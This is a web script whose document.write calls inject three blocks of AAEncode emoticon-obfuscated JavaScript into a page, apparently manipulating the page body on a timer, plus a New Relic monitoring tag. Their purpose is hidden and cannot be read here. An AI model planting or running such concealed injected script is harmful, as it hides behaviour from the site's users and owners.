document.write('ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ [\'_\']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: \'_\' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +\'_\') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ \'_\')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +\'_\')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +\'_\') [c^_^o];(ﾟДﾟ) [\'c\'] = ((ﾟДﾟ)+\'_\') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) [\'o\'] = ((ﾟДﾟ)+\'_\') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) [\'c\']+(ﾟДﾟ) [\'o\']+(ﾟωﾟﾉ +\'_\')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +\'_\') [ﾟｰﾟ] + ((ﾟДﾟ) +\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) [\'c\']+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) [\'o\']+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ];(ﾟДﾟ) [\'_\'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +\'_\') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟωﾟﾉ +\'_\') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]=\'\\\\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +\'_\')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]=\'\\"\';(ﾟДﾟ) [\'_\'] ( (ﾟДﾟ) [\'_\'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) (\'_\');');
document.write('');
document.write('ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ [\'_\']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: \'_\' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +\'_\') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ \'_\')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +\'_\')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +\'_\') [c^_^o];(ﾟДﾟ) [\'c\'] = ((ﾟДﾟ)+\'_\') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) [\'o\'] = ((ﾟДﾟ)+\'_\') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) [\'c\']+(ﾟДﾟ) [\'o\']+(ﾟωﾟﾉ +\'_\')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +\'_\') [ﾟｰﾟ] + ((ﾟДﾟ) +\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) [\'c\']+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) [\'o\']+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ];(ﾟДﾟ) [\'_\'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +\'_\') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟωﾟﾉ +\'_\') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]=\'\\\\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +\'_\')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]=\'\\"\';(ﾟДﾟ) [\'_\'] ( (ﾟДﾟ) [\'_\'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) (\'_\');');
document.write('ﾟωﾟﾉ= /｀ｍ´）ﾉ ~┻━┻   //*´∇｀*/ [\'_\']; o=(ﾟｰﾟ)  =_=3; c=(ﾟΘﾟ) =(ﾟｰﾟ)-(ﾟｰﾟ); (ﾟДﾟ) =(ﾟΘﾟ)= (o^_^o)/ (o^_^o);(ﾟДﾟ)={ﾟΘﾟ: \'_\' ,ﾟωﾟﾉ : ((ﾟωﾟﾉ==3) +\'_\') [ﾟΘﾟ] ,ﾟｰﾟﾉ :(ﾟωﾟﾉ+ \'_\')[o^_^o -(ﾟΘﾟ)] ,ﾟДﾟﾉ:((ﾟｰﾟ==3) +\'_\')[ﾟｰﾟ] }; (ﾟДﾟ) [ﾟΘﾟ] =((ﾟωﾟﾉ==3) +\'_\') [c^_^o];(ﾟДﾟ) [\'c\'] = ((ﾟДﾟ)+\'_\') [ (ﾟｰﾟ)+(ﾟｰﾟ)-(ﾟΘﾟ) ];(ﾟДﾟ) [\'o\'] = ((ﾟДﾟ)+\'_\') [ﾟΘﾟ];(ﾟoﾟ)=(ﾟДﾟ) [\'c\']+(ﾟДﾟ) [\'o\']+(ﾟωﾟﾉ +\'_\')[ﾟΘﾟ]+ ((ﾟωﾟﾉ==3) +\'_\') [ﾟｰﾟ] + ((ﾟДﾟ) +\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ ((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [(ﾟｰﾟ) - (ﾟΘﾟ)]+(ﾟДﾟ) [\'c\']+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ)+(ﾟｰﾟ)]+ (ﾟДﾟ) [\'o\']+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ];(ﾟДﾟ) [\'_\'] =(o^_^o) [ﾟoﾟ] [ﾟoﾟ];(ﾟεﾟ)=((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟДﾟ) .ﾟДﾟﾉ+((ﾟДﾟ)+\'_\') [(ﾟｰﾟ) + (ﾟｰﾟ)]+((ﾟｰﾟ==3) +\'_\') [o^_^o -ﾟΘﾟ]+((ﾟｰﾟ==3) +\'_\') [ﾟΘﾟ]+ (ﾟωﾟﾉ +\'_\') [ﾟΘﾟ]; (ﾟｰﾟ)+=(ﾟΘﾟ); (ﾟДﾟ)[ﾟεﾟ]=\'\\\\\'; (ﾟДﾟ).ﾟΘﾟﾉ=(ﾟДﾟ+ ﾟｰﾟ)[o^_^o -(ﾟΘﾟ)];(oﾟｰﾟo)=(ﾟωﾟﾉ +\'_\')[c^_^o];(ﾟДﾟ) [ﾟoﾟ]=\'\\"\';(ﾟДﾟ) [\'_\'] ( (ﾟДﾟ) [\'_\'] (ﾟεﾟ+(ﾟДﾟ)[ﾟoﾟ]+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟΘﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (o^_^o))+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+((o^_^o) +(o^_^o))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) (\'_\');</script>');
document.write('');
document.write('<script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam-cell.nr-data.net","licenseKey":"62915533ca","applicationID":"14035018","transactionName":"blEHMktWXkQABkRQDFcbMBRQGFFbFQpCVhZNURdISV9A","queueTime":0,"applicationTime":74,"atts":"QhYERANMTUo=","errorBeacon":"bam-cell.nr-data.net","agent":""}</script></body>');
document.write('</html>');
